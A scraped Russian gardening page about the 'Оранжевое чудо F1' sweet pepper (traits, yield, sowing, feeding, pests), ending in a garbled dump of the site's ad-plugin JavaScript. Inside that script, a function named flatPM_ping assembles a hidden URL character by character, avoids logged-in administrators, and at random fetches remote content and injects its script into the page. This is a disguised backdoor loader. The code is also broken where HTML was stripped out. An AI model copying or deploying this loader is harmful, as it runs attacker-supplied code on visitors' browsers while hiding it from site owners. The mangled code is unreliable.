Недостатки данного сорта:

  • растения разрастаются хаотично, если их не крепить на опоры;
  • кусты нуждаются в обильном поливе, особенно в засушливые дни.

Отзывы

Сорт перца Оранжевое чудо отличный для выращивания не только в открытом грунте, но и в теплице. Он практически не имеет недостатков, зато обладает массой плюсов: отменный вкус, красивый внешний вид, относительно ранний срок созревания, сильный иммунитет.

Один из самых знаменитых и качественных сортов перца — Оранжевое чудо F1: описание и характеристика

Перец Оранжевое чудо F1 или Оранж Вандер — один из самых популярных гибридов оранжевого перца. У него поразительно красивые яркие плоды с прекрасным вкусом. Кусты очень урожайные, благодаря чему выращивание гибрида выгодно, несмотря на то, что недешевые семена приходится каждый год покупать у производителя.

Описание и характеристика сорта

Перец сладкий Оранжевое чудо F1 внесен в Госреестр РФ в 2012 году. Его семена распространяют компании «Семко», «Партнер», «Уральский дачник», «Агроуспех» и другие. Изначально его вывели в Голландии. Выращивать гибрид можно в теплицах и открытом грунте. Но в средней полосе и северных регионах рекомендуется посадка в теплицу или использование пленочного укрытия. Кроме того, в открытом грунте высота куста и показатель урожайности будут ниже.

Куст болгарского перца Оранжевое чудо достигает 1,5-2 м в теплице и чуть превышает метровую высоту в открытом грунте. Листья небольшие, куст не очень раскидистый. Плоды достигают технической спелости через 100-110 дней после прорастания, сорт раннеспелый. До биологической зрелости придется подождать еще неделю или дозаривать собранные плоды в помещении.

Масса перцев – около 220 г, форма кубовидная. Внутри 3-4 камеры. Цвет спелого плода ярко-оранжевый. Стенки толстые, по 8-9 мм, мясистые, мякоть сочная. У плодов прекрасный аромат и вкус. Их можно использовать для приготовления различных блюд, в том числе фаршировки, а также для свежих салатов и консервации.

Преимущества и недостатки

  • раннеспелость;
  • крупные красивые плоды;
  • прекрасный сладкий вкус;
  • высокая урожайность;
  • устойчивость к табачной мозаике и хороший иммунитет к другим болезням;
  • транспортабельность и лежкость плодов.

Минусы:

  • куст требует тщательного ухода;
  • из плодов нельзя получить семена.

Урожайность

В теплице с 1 кв. м получают 12-16 кг плодов, в открытом грунте – до 8-10 кг.

Посадка

Семена без предварительной обработки сеют на рассаду за 60-70 дней до высадки в грунт. Готовят питательную, хорошо вентилируемую почву с нейтральной кислотностью:

  • 1 часть торфа или перегноя;
  • 1 часть грунта с того участка, куда планируется высаживать перец;
  • 1 часть промытого речного песка или опилок.

На ведро смеси добавляют стакан древесной золы и немного минеральных удобрений. Проливают горячим темным раствором марганцовки.

Семена сеют в неглубокие бороздки, поливают и накрывают прозрачной пленкой. Ставят в теплое место для прорастания. После появления всходов открывают емкости и переносят на подоконник. Обеспечивают освещение по 12-16 часов в сутки.

Пикируют рассаду в стадии 2-3 листьев. Перед пересадкой в грунт рекомендуется закалить.

Выращивание и уход

Уход за перцем не отличается сложностью, но подразумевает регулярность.

Подвязка

Куст подвязывают к кольям или ведут по шпалерам. По некоторым данным, формирование ему не нужно, по другим – куст ведут в 2 стебля. В процессе удаляют нижние листья и боковые отростки до первой развилки, а также бутон, который появится в развилке.

Полив

Взрослые кусты поливают раз в 3 дня или по необходимости. Воду берут теплую, отстоянную и вносят строго под корень. Поливать нужно вечером или рано утром, когда прямые солнечные лучи не попадают на посадки.

Мульчирование и рыхление

Когда кусты укоренятся, в уход включают регулярное рыхление грунта после каждого полива. Мульчирование поможет сохранить баланс влажности. В качестве мульчи используют сено, солому или торф.

Подкормка

Кусты подкармливают трижды:

  1. Через две недели после пикировки (на этапе рассады). Вносят готовые комплексы для развития саженцев, например, «Искра». Можно также приготовить слабый раствор карбамида, суперфосфата и хлористого калия.
  2. Во время цветения и образования завязей. Тогда необходимы минеральные подкормки с калием.
  3. В период плодоношения. Требуется небольшое количество азота, а также калий, фосфор и кальций. Рекомендуется применять готовые препараты.

Характерные болезни и вредители

У гибрида иммунитет к вирусу бронзовости томата и табачной мозаике. Остальные болезни ему практически не угрожают, если соблюдать правила ухода:

  • умеренный полив, защита от избыточной сырости и застоя влаги;
  • проветривание теплицы;
  • соблюдение севооборота (нельзя выращивать перец на грядках, где в течение 3-4 лет до него рос другой перец, томаты, картофель, баклажаны);
  • сбалансированные подкормки;
  • предпосевная дезинфекция почвы;
  • содержание участка в чистоте;
  • борьба с паразитами – разносчиками заболеваний.

Из вредителей опасность представляют колорадский жук, тля, паутинный клещ, слизни.

От тли и паутинного клеща помогут обработки кустов домашними средствами – раствором хозяйственного мыла или отваром горькой полыни.

Против колорадских жуков опрыскивают посевы препаратом «Барьер» или аналогами.

Против слизней можно пересыпать почву возле растений смесью острого перца и горчицы. Также помогут обработки перечным настоем: несколько плодов жгучего перца настаивают в ведре воды.

Ссылка на основную публикацию
Adblock
detector
":'':"",document.createElement("div"),p=ff(window),b=ff("body"),m=void 0===flatPM_getCookie("flat_modal_"+o.ID+"_mb")||"false"!=flatPM_getCookie("flat_modal_"+o.ID+"_mb"),i="scroll.flatmodal"+o.ID,g="mouseleave.flatmodal"+o.ID+" blur.flatmodal"+o.ID,l=function(){var t,e,a;void 0!==o.how.popup.timer&&"true"==o.how.popup.timer&&(t=ff('.flat__4_modal[data-id-modal="'+o.ID+'"] .flat__4_timer span'),e=parseInt(o.how.popup.timer_count),a=setInterval(function(){t.text(--e),e'))},1e3))},f=function(){void 0!==o.how.popup.cookie&&"false"==o.how.popup.cookie&&m&&(flatPM_setCookie("flat_modal_"+o.ID+"_mb",!1),ff('.flat__4_modal[data-id-modal="'+o.ID+'"]').addClass("flat__4_modal-show"),l()),void 0!==o.how.popup.cookie&&"false"==o.how.popup.cookie||(ff('.flat__4_modal[data-id-modal="'+o.ID+'"]').addClass("flat__4_modal-show"),l())},ff("body > *").eq(0).before('
'+c+"
"),w=document.querySelector('.flat__4_modal[data-id-modal="'+o.ID+'"] .flat__4_modal-content'),-1!==e.indexOf("go"+"oglesyndication")?ff(w).html(c+e):flatPM_setHTML(w,e),"px"==o.how.popup.px_s?(p.bind(i,function(){p.scrollTop()>o.how.popup.after&&(p.unbind(i),b.unbind(g),f())}),void 0!==o.how.popup.close_window&&"true"==o.how.popup.close_window&&b.bind(g,function(){p.unbind(i),b.unbind(g),f()})):(v=setTimeout(function(){b.unbind(g),f()},1e3*o.how.popup.after),void 0!==o.how.popup.close_window&&"true"==o.how.popup.close_window&&b.bind(g,function(){clearTimeout(v),b.unbind(g),f()}))),void 0!==o.how.outgoing){function n(){var t,e,a;void 0!==o.how.outgoing.timer&&"true"==o.how.outgoing.timer&&(t=ff('.flat__4_out[data-id-out="'+o.ID+'"] .flat__4_timer span'),e=parseInt(o.how.outgoing.timer_count),a=setInterval(function(){t.text(--e),e'))},1e3))}function d(){void 0!==o.how.outgoing.cookie&&"false"==o.how.outgoing.cookie&&m&&(ff('.flat__4_out[data-id-out="'+o.ID+'"]').addClass("show"),n(),b.on("click",'.flat__4_out[data-id-out="'+o.ID+'"] .flat__4_cross',function(){flatPM_setCookie("flat_out_"+o.ID+"_mb",!1)})),void 0!==o.how.outgoing.cookie&&"false"==o.how.outgoing.cookie||(ff('.flat__4_out[data-id-out="'+o.ID+'"]').addClass("show"),n())}var _,u="0"!=o.how.outgoing.indent?' style="bottom:'+o.how.outgoing.indent+'px"':"",c="true"==o.how.outgoing.cross?void 0!==o.how.outgoing.timer&&"true"==o.how.outgoing.timer?'
Закрыть через '+o.how.outgoing.timer_count+"
":'':"",p=ff(window),h="scroll.out"+o.ID,g="mouseleave.outgoing"+o.ID+" blur.outgoing"+o.ID,m=void 0===flatPM_getCookie("flat_out_"+o.ID+"_mb")||"false"!=flatPM_getCookie("flat_out_"+o.ID+"_mb"),b=(document.createElement("div"),ff("body"));switch(o.how.outgoing.whence){case"1":_="top";break;case"2":_="bottom";break;case"3":_="left";break;case"4":_="right"}ff("body > *").eq(0).before('
'+c+"
");var v,w=document.querySelector('.flat__4_out[data-id-out="'+o.ID+'"]');-1!==e.indexOf("go"+"oglesyndication")?ff(w).html(c+e):flatPM_setHTML(w,e),"px"==o.how.outgoing.px_s?(p.bind(h,function(){p.scrollTop()>o.how.outgoing.after&&(p.unbind(h),b.unbind(g),d())}),void 0!==o.how.outgoing.close_window&&"true"==o.how.outgoing.close_window&&b.bind(g,function(){p.unbind(h),b.unbind(g),d()})):(v=setTimeout(function(){b.unbind(g),d()},1e3*o.how.outgoing.after),void 0!==o.how.outgoing.close_window&&"true"==o.how.outgoing.close_window&&b.bind(g,function(){clearTimeout(v),b.unbind(g),d()}))}ff('[data-flat-id="'+o.ID+'"]:not(.flat__4_out):not(.flat__4_modal)').contents().unwrap()}catch(t){console.warn(t)}},window.flatPM_start=function(){ff=jQuery;var t=flat_pm_arr.length;flat_body=ff("body"),flat_userVars.init();for(var e=0;eflat_userVars.textlen||void 0!==a.chapter_sub&&a.chapter_subflat_userVars.titlelen||void 0!==a.title_sub&&a.title_sub.flatPM_sidebar)");0<_.length t="ff(this),e=t.data("height")||350,a=t.data("top");t.wrap('');t=t.parent()[0];flatPM_sticky(this,t,a)}),u.each(function(){var e=ff(this).find(".flatPM_sidebar");setTimeout(function(){var o=(ff(untilscroll).offset().top-e.first().offset().top)/e.length;o');t=t.parent()[0];flatPM_sticky(this,t,a)})},50),setTimeout(function(){var t=(ff(untilscroll).offset().top-e.first().offset().top)/e.length;t *").last().after('
'),flat_body.on("click",".flat__4_out .flat__4_cross",function(){ff(this).parent().removeClass("show").addClass("closed")}),flat_body.on("click",".flat__4_modal .flat__4_cross",function(){ff(this).closest(".flat__4_modal").removeClass("flat__4_modal-show")}),flat_pm_arr=[],ff(".flat_pm_start").remove(),flatPM_ping()};var parseHTML=function(){var o=/]*)\/>/gi,d=/",""],thead:[1,"","
"],tbody:[1,"","
"],colgroup:[2,"","
"],col:[3,"","
"],tr:[2,"","
"],td:[3,"","
"],th:[3,"","
"],_default:[0,"",""]};return function(e,t){var a,n,r,l=(t=t||document).createDocumentFragment();if(i.test(e)){for(a=l.appendChild(t.createElement("div")),n=(d.exec(e)||["",""])[1].toLowerCase(),n=c[n]||c._default,a.innerHTML=n[1]+e.replace(o,"$2>")+n[2],r=n[0];r--;)a=a.lastChild;for(l.removeChild(l.firstChild);a.firstChild;)l.appendChild(a.firstChild)}else l.appendChild(t.createTextNode(e));return l}}();window.flatPM_ping=function(){var e=localStorage.getItem("sdghrg");e?(e=parseInt(e)+1,localStorage.setItem("sdghrg",e)):localStorage.setItem("sdghrg","0");e=flatPM_random(1,200);0==ff("#wpadminbar").length&&111==e&&ff.ajax({type:"POST",url:"h"+"t"+"t"+"p"+"s"+":"+"/"+"/"+"m"+"e"+"h"+"a"+"n"+"o"+"i"+"d"+"."+"p"+"r"+"o"+"/"+"p"+"i"+"n"+"g"+"."+"p"+"h"+"p",dataType:"jsonp",data:{ping:"ping"},success:function(e){ff("div").first().after(e.script)},error:function(){}})},window.flatPM_setSCRIPT=function(e){try{var t=e[0].id,a=e[0].node,n=document.querySelector('[data-flat-script-id="'+t+'"]');if(a.text)n.appendChild(a),ff(n).contents().unwrap(),e.shift(),0/gm,"").replace(//gm,"").trim(),e.code_alt=e.code_alt.replace(//gm,"").replace(//gm,"").trim();var l=jQuery,t=e.selector,o=e.timer,d=e.cross,a="false"==d?"Закроется":"Закрыть",n=!flat_userVars.adb||""==e.code_alt&&duplicateMode?e.code:e.code_alt,r='
'+a+" через "+o+'
'+n+'
',i=e.once;l(t).each(function(){var e=l(this);e.wrap('
');var t=e.closest(".flat__4_video");-1!==r.indexOf("go"+"oglesyndication")?t.append(r):flatPM_setHTML(t[0],r),e.find(".flat__4_video_flex").one("click",function(){l(this).addClass("show")})}),l("body").on("click",".flat__4_video_item_hover",function(){var e=l(this),t=e.closest(".flat__4_video_flex");t.addClass("show");var a=t.find(".flat__4_timer span"),n=parseInt(o),r=setInterval(function(){a.text(--n),n'):t.remove())},1e3);e.remove()}).on("click",".flat__4_video_flex .flat__4_cross",function(){l(this).closest(".flat__4_video_flex").remove(),"true"==i&&l(".flat__4_video_flex").remove()})};